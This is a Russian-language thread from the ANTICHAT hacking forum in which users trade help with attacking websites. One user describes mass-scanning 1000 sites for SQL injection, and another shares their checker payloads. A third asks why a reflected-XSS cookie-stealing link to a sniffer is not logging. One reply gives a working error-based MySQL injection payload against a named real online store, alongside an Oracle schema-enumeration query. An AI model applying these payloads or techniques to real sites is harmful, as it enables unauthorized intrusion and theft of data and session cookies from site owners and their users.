ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.11.2014, 22:41
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от XAMEHA
С проверкой наличия SQL-injection всё очень сложно. Инъекции бывают очень разные. Многое зависит от цели - аудит типа black-box конкретного ресурса, проверка списка URL.
Во втором случае будет целесообразнее покрыть N% возможных случаев парой запросов, чем приближаться к 99% используя сотни запросов и большой анализатор.
В первом случае на хороший алгоритм нужны сотни человеко-часов. Или даже тысячи. Можете посмотреть на sqlmap - это самое популярное ПО в этой области. Однако даже оно, бывает, не может определить наличие инъекции, которую профессионал возьмет за 5 минут.
Даже если у вас будет разработка, намного превосходящая sqlmap по эффективности, вы не сможете раскрутить часть инъекций и правильно интерпретировать информацию, т.к. если бы вы могли это сделать - вы бы не задавали этот вопрос.
Для второго случая просто не изобретайте велосипед - все уже есть. Программ - множество, половина с открытыми исходными кодами. Для первого предлагаю почитать статьи по инъекциям. Разбирать инъекции, рассматривать возможные WAF. Может быть тогда вы сможете подойти к вопросу серьезно.
спасибо за ответ, сделал по-своему. погрешность получилась довольно большая, из списка в 1000 сайтов после ручной проверки нашлось порядка 370+ уязвимых сайтов. скрипт ошибочно определяет на 180+ больше. делал с помощью алгоритма diff, для моих задач этого было достаточно. цель стояла определить, но не раскрутить.
P. S. все цифры приблизительны, я тоже мог много упустить, учитывая мой небольшой опыт
|
|
|
09.11.2014, 22:51
|
|
Участник форума
Регистрация: 19.02.2011
Сообщений: 134
Провел на форуме:
30194
Репутация:
5
|
|
Сообщение от None
спасибо за ответ, сделал по-своему. погрешность получилась довольно большая, из списка в 1000 сайтов после ручной проверки нашлось порядка 370+ уязвимых сайтов. скрипт ошибочно определяет на 180+ больше. делал с помощью алгоритма diff, для моих задач этого было достаточно. цель стояла определить, но не раскрутить.
P. S. все цифры приблизительны, я тоже мог много упустить, учитывая мой небольшой опыт
писал для себя тоже подобный чекер, вся сложность в том, что при ковычке к примеру, меняется какая-то область сайта, я делал так, +and(1=1)--+ и так несколько раз, естественно меняя 1=1, тк в странице могут быть часы, банеры и тн, которые постонно меняются! Но даже он не дал 100% результата!
|
|
|
|
10.11.2014, 00:32
|
|
Новичок
Регистрация: 19.01.2014
Сообщений: 17
Провел на форуме:
5283
Репутация:
0
|
|
Доброго времени суток. Нашёл на сайте пассивную XSS, зарегался. С онлайн снифера взял ссылку на картинку, составил запрос, сам перешёл по ссылке, но на снифере логов нету. Может ли быть, что браузер не даёт отправиться кукам? JavaScript включён.
|
|
|
|
10.11.2014, 19:00
|
|
Новичок
Регистрация: 07.11.2013
Сообщений: 12
Провел на форуме:
2764
Репутация:
0
|
|
Подскажите как в Oracle вывести имена всех баз данных? типа как в mysql schema_name from schemata
|
|
|
|
10.11.2014, 19:37
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от andrxx
Подскажите как в Oracle вывести имена всех баз данных? типа как в mysql schema_name from schemata
Код:
SELECT * FROM all_users;
|
|
|
|
10.11.2014, 19:49
|
|
Новичок
Регистрация: 07.11.2013
Сообщений: 12
Провел на форуме:
2764
Репутация:
0
|
|
Сообщение от faza02
Код:
SELECT * FROM all_users;
структура all_users
Сообщение от None
USERNAME USER_ID CREATED
где там названия баз посмотреть?
|
|
|
|
10.11.2014, 19:57
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от andrxx
структура all_users
где там названия баз посмотреть?
username и есть имя базы.
|
|
|
|
11.11.2014, 03:08
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197
Репутация:
25
|
|
Код HTML:
http://www.experiencerc.com/store/index.php?cPath=10_206_207_570&limit=1180'
Можно что нибудт придумать в limit? |
|
|
|
11.11.2014, 09:50
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от Br@!ns
Код HTML:
http://www.experiencerc.com/store/index.php?cPath=10_206_207_570&limit=1180'
Можно что нибудт придумать в limit? www.experiencerc.com/store/index.php?cPath=10_206_207_570&limit=1180 PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY (SELECT 1 from information_schema.tables group by concat((SELECT version()),floor(rand(0)*2)) having min(0))))+--+
|
|
|
|
14.11.2014, 13:55
|
|
Флудер
Регистрация: 02.04.2011
Сообщений: 2,531
Провел на форуме:
755326
Репутация:
99
|
|
всем привет
что это за вид уязвимости такой ? как он называется ?
нашёл видео - которое показывает такой метод, на укозе правда, но если он действует в разных ситуациях: https://www.youtube.com/watch?v=0I5FnjP_m0U
я таким образом удалил основной email Логин в панели управления доменом https://ru.domaincontext.com - который по идеи не удаляется |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
